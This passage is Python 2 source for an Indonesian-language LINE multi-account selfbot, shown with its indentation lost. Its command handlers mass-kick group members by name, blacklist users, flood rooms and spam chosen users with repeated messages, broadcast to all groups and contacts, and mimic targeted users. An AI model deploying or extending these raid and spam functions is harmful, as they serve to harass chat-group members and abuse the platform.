elif msg.text in ["Bot Like", "Bot like"]: #Semua Bot Ngelike Status Akun Utama
if msg.from_ in owner:
print "[Command]Like executed"
cl.sendText(msg.to,"Kami Siap Like Status Owner\nKami Delay untuk beberapa Detik\nJangan perintah kami dulu sampai kami Selesai Ngelike")
try:
likePost()
except:
pass
elif msg.text in ["Like temen", "Bot like temen"]: #Semua Bot Ngelike Status Teman
if msg.from_ in owner:
print "[Command]Like executed"
cl.sendText(msg.to,"Kami Siap Like Status Teman Boss")
cl.sendText(msg.to,"Kami Siap Like Status Owner\nKami Delay untuk beberapa Detik\nJangan perintah kami dulu sampai kami Selesai Ngelike")
try:
autolike()
except:
pass
#----------------Banned-user kick function: start-----------------------#
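# "Kill" below kicks every group member whose mid is in wait["blacklist"], using a
# randomly chosen bot from the client list for each kick.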
elif msg.text in ["Kill "]:
if msg.from_ in admin:
if msg.toType == 2:
group = random.choice(KAC).getGroup(msg.to)
gMembMids = [contact.mid for contact in group.members]
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, gMembMids)
if matched_list == []:
random.choice(KAC).sendText(msg.to,"Selamat tinggal")
random.choice(KAC).sendText(msg.to,"Jangan masuk lagidevil smile")
return
for jj in matched_list:
try:
klist=[cl,ki,kk,kc,ks]
kicker=random.choice(klist)
kicker.kickoutFromGroup(msg.to,[jj])
print (msg.to,[jj])
except:
pass
#----------------Banned-user kick function: finish----------------------#
elif "Ready op" in msg.text:
if msg.from_ in owner:
if msg.toType == 2:
print "ok"
_name = msg.text.replace("Ready op","")
gs = cl.getGroup(msg.to)
gs = ki.getGroup(msg.to)
gs = kk.getGroup(msg.to)
gs = kc.getGroup(msg.to)
gs = ks.getGroup(msg.to)
gs = k1.getGroup(msg.to)
gs = k2.getGroup(msg.to)
gs = k3.getGroup(msg.to)
gs = k4.getGroup(msg.to)
random.choice(KAC).sendText(msg.to,"Eh Ini Room apaan?")
random.choice(KAC).sendText(msg.to,"Ratain aja lah\nRoom Ga Berguna..")
random.choice(KAC).sendText(msg.to,"Jangan Baper yah Tollll;")
msg.contentType = 13
msg.contentMetadata = {'mid': mid}
random.choice(KAC).sendMessage(msg)
targets = []
for g in gs.members:
if _name in g.displayName:
targets.append(g.mid)
if targets == []:
random.choice(KAC).sendText(msg.to,"Not found")
else:
for target in targets:
if target not in Bots:
try:
klist=[cl,ki,kk,kc,ks,k1,k2,k3,k4]
kicker=random.choice(klist)
kicker.kickoutFromGroup(msg.to,[target])
print (msg.to,[g.mid])
except:
random.choice(KAC).kickoutFromGroup(msg.to,[target])
random.choice(KAC).sendText(msg.to,"Koq Ga Ditangkis Wooyyy?\Lemah Banget Nih Room")
elif "Greet" in msg.text:
if msg.from_ in owner:
if msg.toType == 2:
print "ok"
_name = msg.text.replace("Greet","")
gs = ki.getGroup(msg.to)
gs = kk.getGroup(msg.to)
gs = kc.getGroup(msg.to)
gs = ks.getGroup(msg.to)
gs = k1.getGroup(msg.to)
gs = k2.getGroup(msg.to)
gs = k3.getGroup(msg.to)
gs = k4.getGroup(msg.to)
ki.sendText(msg.to,"maaf kalo gak sopan")
kk.sendText(msg.to,"makasih semuanya..")
kc.sendText(msg.to,"hehehhehe")
msg.contentType = 13
msg.contentMetadata = {'mid': mid}
ks.sendMessage(msg)
targets = []
for g in gs.members:
if _name in g.displayName:
targets.append(g.mid)
if targets == []:
ki.sendText(msg.to,"Not found")
else:
for target in targets:
if target not in Bots:
try:
klist=[ki,kk,kc,ks,k1,k2,k3,k4]
kicker=random.choice(klist)
kicker.kickoutFromGroup(msg.to,[target])
print (msg.to,[g.mid])
except:
ki.sendText(msg.to,"Group cleanse")
kk.sendText(msg.to,"Group cleanse")
kc.sendText(msg.to,"Group cleanse")
elif msg.text in ["Salam1"]:
ki.sendText(msg.to,"السَّلاَمُ عَلَيْكُمْ وَرَحْمَةُ اللهِ وَبَرَكَاتُهُ")
kk.sendText(msg.to,"Assalamu'alaikum")
elif msg.text in ["Salam2"]:
ki.sendText(msg.to,"وَعَلَيْكُمْ السَّلاَمُرَحْمَةُ اللهِ وَبَرَكَاتُهُ")
kk.sendText(msg.to,"Wa'alaikumsallam.Wr,Wb")
elif "Salam3" in msg.text:
if msg.from_ in owner:
ki.sendText(msg.to,"السَّلاَمُ عَلَيْكُمْ وَرَحْمَةُ اللهِ وَبَرَكَاتُهُ")
kk.sendText(msg.to,"Assalamu'alaikum")
ki.sendText(msg.to,"وَعَلَيْكُمْ السَّلاَمُ وَرَحْمَةُ اللهِوَبَرَكَاتُهُ")
kk.sendText(msg.to,"Wa'alaikumsallam.Wr,Wb")
if msg.toType == 2:
print "ok"
_name = msg.text.replace("Salam3","")
gs = ki.getGroup(msg.to)
gs = kk.getGroup(msg.to)
gs = kc.getGroup(msg.to)
gs = ks.getGroup(msg.to)
gs = k1.getGroup(msg.to)
gs = k2.getGroup(msg.to)
gs = k3.getGroup(msg.to)
gs = k4.getGroup(msg.to)
ki.sendText(msg.to,"maaf kalo gak sopan")
ki2.sendText(msg.to,"Qo salamnya gak ada yang jawab ya..!!")
ki3.sendText(msg.to,"hehehhehe")
msg.contentType = 13
msg.contentMetadata = {'mid': mid}
ks.sendMessage(msg)
targets = []
for g in gs.members:
if _name in g.displayName:
targets.append(g.mid)
if targets == []:
ki.sendText(msg.to,"Not found")
else:
for target in targets:
if target not in Bots:
try:
klist=[ki,kk,kc,ks,k1,k2,k3,k4]
kicker=random.choice(klist)
kicker.kickoutFromGroup(msg.to,[target])
print (msg.to,[g.mid])
except:
ki.sendText(msg.to,"السَّلاَمُ عَلَيْكُمْ وَرَحْمَةُ اللهِ وَبَرَكَاتُهُ")
kk.sendText(msg.to,"وَعَلَيْكُمْ السَّلاَمُ وَرَحْمَةُ اللهِوَبَرَكَاتُهُ")
kc.sendText(msg.to,"Nah salamnya jawab sendiri dah")
#----------------Kick-user-target function: start----------------------#
elif "Sok " in msg.text:
if msg.from_ in admin:
nk0 = msg.text.replace("Sok ","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("@","")
nk3 = nk2.rstrip()
_name = nk3
gs = cl.getGroup(msg.to)
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
sendMessage(msg.to,"user does not exist")
pass
else:
for target in targets:
try:
klist=[cl,ki,kk,kc]
kicker=random.choice(klist)
kicker.kickoutFromGroup(msg.to,[target])
print (msg.to,[g.mid])
except:
random.choice(KAC).sendText(msg.to,"Maaf ya....")
elif "Nk " in msg.text:
if msg.from_ in admin:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"] [0] ["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
cl.kickoutFromGroup(msg.to,[target])
except:
cl.sendText(msg.to,"Error")
elif "Cium " in msg.text:
if msg.from_ in admin:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"] [0] ["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
cl.kickoutFromGroup(msg.to,[target])
except:
cl.sendText(msg.to,"Error")
elif "Tajong " in msg.text:
if msg.from_ in admin:
nk0 = msg.text.replace("Tajong ","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("@","")
nk3 = nk2.rstrip()
_name = nk3
gs = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
gs.preventJoinByTicket = False
cl.updateGroup(gs)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
satpam1.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
sendMessage(msg.to,"user does not exist")
pass
else:
for target in targets:
try:
satpam1.kickoutFromGroup(msg.to,[target])
print (msg.to,[g.mid])
except:
satpam1.leaveGroup(msg.to)
gs = cl.getGroup(msg.to)
gs.preventJoinByTicket = True
cl.updateGroup(gs)
#----------------Kick-user-target function: finish----------------------#
elif "Blacklist @ " in msg.text:
if msg.from_ in admin:
_name = msg.text.replace("Blacklist @ ","")
_kicktarget = _name.rstrip(' ')
gs = random.choice(KAC).getGroup(msg.to)
targets = []
for g in gs.members:
if _kicktarget == g.displayName:
targets.append(g.mid)
if targets == []:
random.choice(KAC).sendText(msg.to,"Not found")
else:
for target in targets:
try:
wait["blacklist"][target] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
random.choice(KAC).sendText(msg.to,"Succes Plak")
except:
random.choice(KAC).sendText(msg.to,"error")
#----------------Ban-user-target function: start-----------------------#
elif "Banned @" in msg.text:
if msg.from_ in admin:
if msg.toType == 2:
print "[Banned] Sukses"
_name = msg.text.replace("Banned @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
gs = ki.getGroup(msg.to)
gs = kk.getGroup(msg.to)
gs = kc.getGroup(msg.to)
gs = ks.getGroup(msg.to)
gs = k1.getGroup(msg.to)
gs = k2.getGroup(msg.to)
gs = k3.getGroup(msg.to)
gs = k4.getGroup(msg.to)
gs = k5.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Dilarang Banned Bot")
ki.sendText(msg.to,"Dilarang Banned Bot")
kk.sendText(msg.to,"Dilarang Banned Bot")
else:
for target in targets:
try:
wait["blacklist"][target] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
random.choice(KAC).sendText(msg.to,"Akun telah sukses di banned")
except:
random.choice(KAC).sendText(msg.to,"Error")
#----------------Ban-user-target function: finish-----------------------#
#----------------Mid via Tag--------------
elif "Mid @" in msg.text:
if msg.from_ in owner:
_name = msg.text.replace("Mid @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
for g in gs.members:
if _nametarget == g.displayName:
random.choice(KAC).sendText(msg.to, g.mid)
else:
pass
#-----------------------------------------
#----------------Unban-user-target function: start-----------------------#
elif "Unban @" in msg.text:
if msg.from_ in admin:
if msg.toType == 2:
print "[Unban] Sukses"
_name = msg.text.replace("Unban @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
gs = ki.getGroup(msg.to)
gs = kk.getGroup(msg.to)
gs = kc.getGroup(msg.to)
gs = ks.getGroup(msg.to)
gs = k1.getGroup(msg.to)
gs = k2.getGroup(msg.to)
gs = k3.getGroup(msg.to)
gs = k4.getGroup(msg.to)
gs = k5.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Tidak Ditemukan.....")
ki.sendText(msg.to,"Tidak Ditemukan.....")
kk.sendText(msg.to,"Tidak Ditemukan.....")
else:
for target in targets:
try:
del wait["blacklist"][target]
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"Akun Bersih Kembali")
except:
ki.sendText(msg.to,"Error")
#----------------Unban-user-target function: finish-----------------------#
#-------------Spam function: start---------------------#
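# "Up" simply floods the room: each listed bot sends the same filler line many times
# to push earlier messages out of view.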
elif msg.text in ["Up","up","Up Chat","Up chat","up chat","Upchat","upchat"]:
if msg.from_ in admin:
cl.sendText(msg.to,"P squared up!")
ki.sendText(msg.to,"P squared up!")
kk.sendText(msg.to,"P squared up!")
cl.sendText(msg.to,"P squared up!")
ki.sendText(msg.to,"P squared up!")
kk.sendText(msg.to,"P squared up!")
cl.sendText(msg.to,"P squared up!")
ki.sendText(msg.to,"P squared up!")
kk.sendText(msg.to,"P squared up!")
cl.sendText(msg.to,"P squared up!")
ki.sendText(msg.to,"P squared up!")
kk.sendText(msg.to,"P squared up!")
cl.sendText(msg.to,"P squared up!")
ki.sendText(msg.to,"P squared up!")
kk.sendText(msg.to,"P squared up!")
cl.sendText(msg.to,"P squared up!")
ki.sendText(msg.to,"P squared up!")
kk.sendText(msg.to,"P squared up!")
cl.sendText(msg.to,"P squared up!")
ki.sendText(msg.to,"P squared up!")
kk.sendText(msg.to,"P squared up!")
cl.sendText(msg.to,"P squared up!")
ki.sendText(msg.to,"P squared up!")
kk.sendText(msg.to,"P squared up!")
cl.sendText(msg.to,"P squared up!")
ki.sendText(msg.to,"P squared up!")
kk.sendText(msg.to,"P squared up!")
cl.sendText(msg.to,"P squared up!")
ki.sendText(msg.to,"P squared up!")
kk.sendText(msg.to,"P squared up!")
k1.sendText(msg.to,"P squared up!")
k1.sendText(msg.to,"P squared up!")
k1.sendText(msg.to,"P squared up!")
k1.sendText(msg.to,"P squared up!")
k1.sendText(msg.to,"P squared up!")
k1.sendText(msg.to,"P squared up!")
k1.sendText(msg.to,"P squared up!")
k1.sendText(msg.to,"P squared up!")
k2.sendText(msg.to,"P squared up!")
k2.sendText(msg.to,"P squared up!")
k2.sendText(msg.to,"P squared up!")
k2.sendText(msg.to,"P squared up!")
k2.sendText(msg.to,"P squared up!")
k2.sendText(msg.to,"P squared up!")
k2.sendText(msg.to,"P squared up!")
k2.sendText(msg.to,"P squared up!")
k2.sendText(msg.to,"P squared up!")
k2.sendText(msg.to,"P squared up!")
k2.sendText(msg.to,"P squared up!")
k5.sendText(msg.to,"P squared up!")
k5.sendText(msg.to,"P squared up!")
k5.sendText(msg.to,"P squared up!")
k5.sendText(msg.to,"P squared up!")
k5.sendText(msg.to,"P squared up!")
k5.sendText(msg.to,"P squared up!")
k5.sendText(msg.to,"P squared up!")
k5.sendText(msg.to,"P squared up!")
k5.sendText(msg.to,"P squared up!")
k5.sendText(msg.to,"P squared up!")
k5.sendText(msg.to,"P squared up!")
k5.sendText(msg.to,"P squared up!")
k5.sendText(msg.to,"P squared up!")
k5.sendText(msg.to,"P squared up!")
k5.sendText(msg.to,"P squared up!")
k5.sendText(msg.to,"P squared up!")
k5.sendText(msg.to,"P squared up!")
k5.sendText(msg.to,"P squared up!")
k5.sendText(msg.to,"P squared up!")
k5.sendText(msg.to,"P squared up!")
k5.sendText(msg.to,"P squared up!")
#-------------Spam function: finish---------------------#
#----------------------------[Spam To Contact]----------------------------#WORK
elif "Spamcontact @" in msg.text:
if msg.from_ in owner:
_name = msg.text.replace("Spamcontact @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
for g in gs.members:
if _nametarget == g.displayName:
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
kk.sendText(g.mid,"Jangan Ngintip")
kk.sendText(g.mid,"Jangan Ngintip")
kk.sendText(g.mid,"Jangan Ngintip")
kk.sendText(g.mid,"Jangan Ngintip")
kk.sendText(g.mid,"Jangan Ngintip")
kk.sendText(g.mid,"Jangan Ngintip")
kk.sendText(g.mid,"Jangan Ngintip")
kk.sendText(g.mid,"Jangan Ngintip")
kk.sendText(g.mid,"Jangan Ngintip")
kk.sendText(g.mid,"Jangan Ngintip")
kk.sendText(g.mid,"Jangan Ngintip")
kk.sendText(g.mid,"Jangan Ngintip")
kk.sendText(g.mid,"Jangan Ngintip")
kk.sendText(g.mid,"Jangan Ngintip")
kk.sendText(g.mid,"Jangan Ngintip")
kk.sendText(g.mid,"Jangan Ngintip")
kk.sendText(g.mid,"Jangan Ngintip")
kk.sendText(g.mid,"Jangan Ngintip")
kk.sendText(g.mid,"Jangan Ngintip")
kk.sendText(g.mid,"Jangan Ngintip")
kk.sendText(g.mid,"Jangan Ngintip")
kk.sendText(g.mid,"Jangan Ngintip")
kk.sendText(g.mid,"Jangan Ngintip")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
cl.sendText(msg.to, "Target Spam, Done...!!!")
kk.sendText(msg.to, "Target Spam, Done...!!!")
k1.sendText(msg.to, "Target Spam, Done...!!!")
print " Spammed !"
#----------------------------[Spam To Contact]----------------------------#WORK
#--------------------Start-----------------------#
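# Fortune-style commands: each handler below picks a random canned answer with
# random.choice() and has one or more bots echo it back.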
elif "Apakah " in msg.text:
tanya = msg.text.replace("Apakah ","")
jawab = ("Ya","Tidak","Bisa Jadi","Mungkin")
jawaban = random.choice(jawab)
cl.sendText(msg.to,jawaban)
k1.sendText(msg.to,jawaban)
kk.sendText(msg.to,jawaban)
elif "Berapa besar cinta " in msg.text:
tanya = msg.text.replace("Berapa besar cinta ","")
jawab = ("0%","25%","50%","75%","100%")
jawaban = random.choice(jawab)
cl.sendText(msg.to,jawaban)
kk.sendText(msg.to,jawaban)
kk.sendText(msg.to,jawaban)
elif "Siapakah cewek " in msg.text:
tanya = msg.text.replace("Siapakah cewek ","")
jawab = ("Maryati�","Ida�","Uke�","Alyn�","Ikka�","Yunikey�","Qwenie�","Gendis�","Aryani�","Nindy�","Wina�","Dewi�","Ifah�")
jawaban = random.choice(jawab)
cl.sendText(msg.to,jawaban)
ki.sendText(msg.to,jawaban)
ki.sendText(msg.to,jawaban)
elif "Siapakah cowok " in msg.text:
tanya = msg.text.replace("Siapakah cowok ","")
jawab = ("Arjun�","Ahmad khan�","Hajir�","Dd�","Indra�","Jeong�","Yogi�","Ary??�","Ucil�")
jawaban = random.choice(jawab)
cl.sendText(msg.to,jawaban)
ki.sendText(msg.to,jawaban)
k5.sendText(msg.to,jawaban)
elif "Adakah " in msg.text:
tanya = msg.text.replace("Adakah ","")
jawab = ("Tidak tahu.","Ada.","Tidak ada.","Mungkin ada")
jawaban = random.choice(jawab)
cl.sendText(msg.to,jawaban)
k3.sendText(msg.to,jawaban)
k3.sendText(msg.to,jawaban)
elif "Cakepkah " in msg.text:
tanya = msg.text.replace("Cakepkah ","")
jawab = ("Jelek.","Cakep.","Lumayan.","Kaya jembut.")
jawaban = random.choice(jawab)
cl.sendText(msg.to,jawaban)
k1.sendText(msg.to,jawaban)
k1.sendText(msg.to,jawaban)
elif "Pahala @" in msg.text:
tanya = msg.text.replace("Pahala @","")
jawab = ("10%","20%","40%","50%","70%","80%","Tidak ada")
jawaban = random.choice(jawab)
cl.sendText(msg.to,"Pahalanya" + tanya + "adalah " + jawaban + "\nTobatlah Nak\nPerbaikin Pahalamu")
#-------------------Finish-----------------------#
elif msg.text.lower() == 'runtime':
eltime = time.time() - mulai
van = "Bot sudah berjalan selama "+waktu(eltime)
cl.sendText(msg.to,van)
#-------------Broadcast function: start------------#
elif "GBc " in msg.text: #NgeBC Ke semua Group yang di Join :D
if msg.from_ in owner:
bctxt = msg.text.replace("GBc ","")
a = cl.getGroupIdsJoined()
a = ki.getGroupIdsJoined()
a = kk.getGroupIdsJoined()
a = kc.getGroupIdsJoined()
a = ks.getGroupIdsJoined()
for taf in a:
cl.sendText(taf, (bctxt))
ki.sendText(taf, (bctxt))
kk.sendText(taf, (bctxt))
kc.sendText(taf, (bctxt))
ks.sendText(taf, (bctxt))
#-------------Broadcast function------------#
elif "Bc " in msg.text:
bctxt = msg.text.replace("Bc ","")
cl.sendText(msg.to,(bctxt))
cl.sendText(msg.to,(bctxt))
k1.sendText(msg.to,(bctxt))
k2.sendText(msg.to,(bctxt))
k3.sendText(msg.to,(bctxt))
#--------------Broadcast function: finish-----------#
elif msg.text in ["LG"]: #Melihat List Group
if msg.from_ in admin:
gids = cl.getGroupIdsJoined()
h = ""
for i in gids:
#####gn = cl.getGroup(i).name
h += "[•]%s Member\n" % (cl.getGroup(i).name +"👉"+str(len(cl.getGroup(i).members)))
cl.sendText(msg.to,"=======[List Group]======\n"+ h +"Total Group :"+str(len(gids)))
elif msg.text in ["LG2"]: #Melihat List Group + ID Groupnya (Gunanya Untuk Perintah InviteMeTo:)
if msg.from_ in owner:
gid = cl.getGroupIdsJoined()
h = ""
for i in gid:
h += "[%s]:%s\n" % (cl.getGroup(i).name,i)
cl.sendText(msg.to,h)
#--------------List Group------------
#------------ Keluar Dari Semua Group------
elif msg.text in ["Bot kadieu","Bot arampih"]: # Keluar Dari Semua Group Yang Di dalem nya ada bot(Kalo Bot Kalian Nyangkut di Group lain :D)
if msg.from_ in owner:
gid = cl.getGroupIdsJoined()
gid = ki.getGroupIdsJoined()
gid = kk.getGroupIdsJoined()
gid = kc.getGroupIdsJoined()
gid = ks.getGroupIdsJoined()
gid = k1.getGroupIdsJoined()
gid = k2.getGroupIdsJoined()
gid = k3.getGroupIdsJoined()
gid = k4.getGroupIdsJoined()
gid = k5.getGroupIdsJoined()
for i in gid:
ks.leaveGroup(i)
kc.leaveGroup(i)
ki.leaveGroup(i)
kk.leaveGroup(i)
k1.leaveGroup(i)
k2.leaveGroup(i)
k3.leaveGroup(i)
k4.leaveGroup(i)
k5.leaveGroup(i)
cl.leaveGroup(i)
if wait["lang"] == "JP":
cl.sendText(msg.to,"Bye~Bye " + str(ginfo.name) + "\n\nBots Dipaksa Keluar oleh Owner Bots...!!!\nMakasih...!!!")
else:
cl.sendText(msg.to,"He declined all invitations")
#------------------------End---------------------
#-------------------------------------------------
elif "Pm cast " in msg.text:
if msg.from_ in owner:
bctxt = msg.text.replace("Pm cast ", "")
t = cl.getAllContactIds()
for manusia in t:
cl.sendText(manusia,(bctxt))
elif "Broadcast " in msg.text:
if msg.from_ in owner:
bctxt = msg.text.replace("Broadcast ", "")
n = cl.getGroupIdsJoined()
for manusia in n:
cl.sendText(manusia,(bctxt +"\n\n\nbroadcasted by:" + cl.getContact(msg.from_).displayName))
#-----------------End-----------
elif msg.text in ["hai","Hai"]:
ki.sendText(msg.to,"Hai Every Body Har Har")
kk.sendText(msg.to,"Hai Every Body Har Har")
kc.sendText(msg.to,"Hai Every Body Har Har")
elif msg.text in ["nah","Nah"]:
ki.sendText(msg.to,"Kan")
kk.sendText(msg.to,"Kan")
kc.sendText(msg.to,"Kan")
#-----------------------------------------------)
elif msg.text in ["Wc","wc","kam"]:
ki.sendText(msg.to,"Selamat datang di Group Kami")
kk.sendText(msg.to,"Jangan nakal ok!")
#-----------------------------------------------
elif msg.text in ["PING","Ping","ping"]:
ki.sendText(msg.to,"PONG double thumbs upHar Har")
kk.sendText(msg.to,"PONG double thumbs upHar Har")
kc.sendText(msg.to,"PONG double thumbs upHar Har")
#-----------------------------------------------
#-------------Response function: start---------------------#
elif msg.text in ["Absen","Respon"]:
if msg.from_ in admin:
ki.sendText(msg.to,"★")
kk.sendText(msg.to,"★★")
kc.sendText(msg.to,"★★★")
ks.sendText(msg.to,"★★★★")
cl.sendText(msg.to,"★★★★★")
k1.sendText(msg.to,"★★★★★★")
k2.sendText(msg.to,"★★★★★★★")
k3.sendText(msg.to,"★★★★★★★★")
k4.sendText(msg.to,"★★★★★★★★★")
k5.sendText(msg.to,"★★★★★★★★★★")
random.choice(KAC).sendText(msg.to,"Semua Hadir Boss\nSiap Protect Group\nAman Gak Aman Yang Penting Anu\n[✰ tɛǟʍ ċʏɮɛʀ-ǟʀʍʏ ɮօt ✰]")
#-------------Response function: finish---------------------#
#==========================================
elif "Youtube " in msg.text.lower():
if msg.from_ in admin:
query = msg.text.split(" ")
try:
if len(query) == 3:
isi = yt(query[2])
hasil = isi[int(query[1])-1]
cl.sendText(msg.to, hasil)
else:
isi = yt(query[1])
cl.sendText(msg.to, isi[0])
except Exception as e:
cl.sendText(msg.to, str(e))
elif "youtube " in msg.text.lower():
query = msg.text.split(" ")
try:
if len(query) == 3:
isi = yt(query[2])
hasil = isi[int(query[1])-1]
cl.sendText(msg.to, hasil)
else:
isi = yt(query[1])
cl.sendText(msg.to, isi[0])
except Exception as e:
cl.sendText(msg.to, str(e))
elif 'Vidio ' in msg.text:
if msg.from_ in admin:
try:
textToSearch = (msg.text).replace('Vidio ', "").strip()
query = urllib.quote(textToSearch)
url = "https://www.youtube.com/results?search_query=" + query
response = urllib2.urlopen(url)
html = response.read()
soup = BeautifulSoup(html, "html.parser")
results = soup.find(attrs={'class':'yt-uix-tile-link'})
ght=('https://www.youtube.com' + results['href'])
cl.sendVideoWithURL(msg.to,ght)
except:
cl.sendText(msg.to,"Could not find it")
#==========================================
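# Mimic: when the sender is marked as a target, the secondary bots repeat the sender's
# text, stickers (contentType 7) or shared contacts (contentType 13). Note the echo
# branch below checks mimic["target"]/mimic["status"], while the "Mimic on/off" and
# "Target" commands further down toggle wait3; these are assumed to be kept in sync
# elsewhere. The commented-out block is an older implementation left disabled.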
elif msg.from_ in mimic["target"] and mimic["status"] == True and mimic["target"][msg.from_] == True:
text = msg.text
if text is not None:
ki.sendText(msg.to,text)
kc.sendText(msg.to,text)
kk.sendText(msg.to,text)
ks.sendText(msg.to,text)
else:
if msg.contentType == 7:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "6",
"STKPKGID": "1",
"STKVER": "100" }
kk.sendMessage(msg)
ki.sendMessage(msg)
kc.sendMessage(msg)
ks.sendMessage(msg)
elif msg.contentType == 13:
msg.contentType = 13
msg.contentMetadata = {'mid': msg.contentMetadata["mid"]}
kk.sendMessage(msg)
ki.sendMessage(msg)
kc.sendMessage(msg)
ks.sendMessage(msg)
# elif msg.text in ["Target list"]:
# if msg.from_ in admin:
# if mimic["target"] == {}:
# cl.sendText(msg.to,"nothing")
# else:
# mc = "Target mimic user\n"
# for mi_d in mimic["target"]:
# mc += "✔️ "+cl.getContact(mi_d).displayName + "\n"
# cl.sendText(msg.to,mc)
# elif "Mimic:" in msg.text:
# if msg.from_ in admin:
# cmd = msg.text.replace("Mimic:","")
# if cmd == "on":
# if mimic["status"] == False:
# mimic["status"] = True
# cl.sendText(msg.to,"turning on mimic")
#
# else:
# cl.sendText(msg.to,"mimic have been enable")
# elif cmd == "off":
# if mimic["status"] == True:
# mimic["status"] = False
# cl.sendText(msg.to,"turning off mimic")
#
# else:
# cl.sendText(msg.to,"Mimic have been desable")
# elif "Mimic target " in cmd:
# if msg.from_ in admin:
# target0 = msg.text.replace("Mimic target ","")
# target1 = target0.lstrip()
# target2 = target1.replace("@","")
# target3 = target2.rstrip()
# _name = target3
# gInfo = cl.getGroup(msg.to)
# targets = []
# for a in gInfo.members:
# if _name == a.displayName:
# targets.append(a.mid)
# if targets == []:
# cl.sendText(msg.to,"No targets")
#
# else:
# for target in targets:
# try:
# mimic["target"][target] = True
# cl.sendText(msg.to,"Success added target")
#
# #cl.sendMessageWithMention(msg.to,target)
# break
# except:
# cl.sendText(msg.to,"Failed")
#
# break
# elif "Untarget " in cmd:
# if msg.from_ in admin:
# target0 = msg.text.replace("Untarget ","")
# target1 = target0.lstrip()
# target2 = target1.replace("@","")
# target3 = target2.rstrip()
# _name = target3
# gInfo = cl.getGroup(msg.to)
# gInfo = ki.getGroup(msg.to)
# targets = []
# for a in gInfo.members:
# if _name == a.displayName:
# targets.append(a.mid)
# if targets == []:
# cl.sendText(msg.to,"No targets")
# else:
# for target in targets:
# try:
# del mimic["target"][target]
# cl.sendText(msg.to,"Success deleted target")
#cl.sendMessageWithMention(msg.to,target)
# break
# except:
# cl.sendText(msg.to,"Failed!")
#==========================================
elif msg.text in ["Mimic on","mimic on","Mimic:on"]:
if msg.from_ in admin:
if wait3["copy"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already on")
else:
cl.sendText(msg.to,"Mimic On")
else:
wait3["copy"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Mimic On")
else:
cl.sendText(msg.to,"Already on")
elif msg.text in ["Mimic off","mimic off","Mimic:off"]:
if msg.from_ in admin:
if wait3["copy"] == False:
if wait["lang"] == "JP":
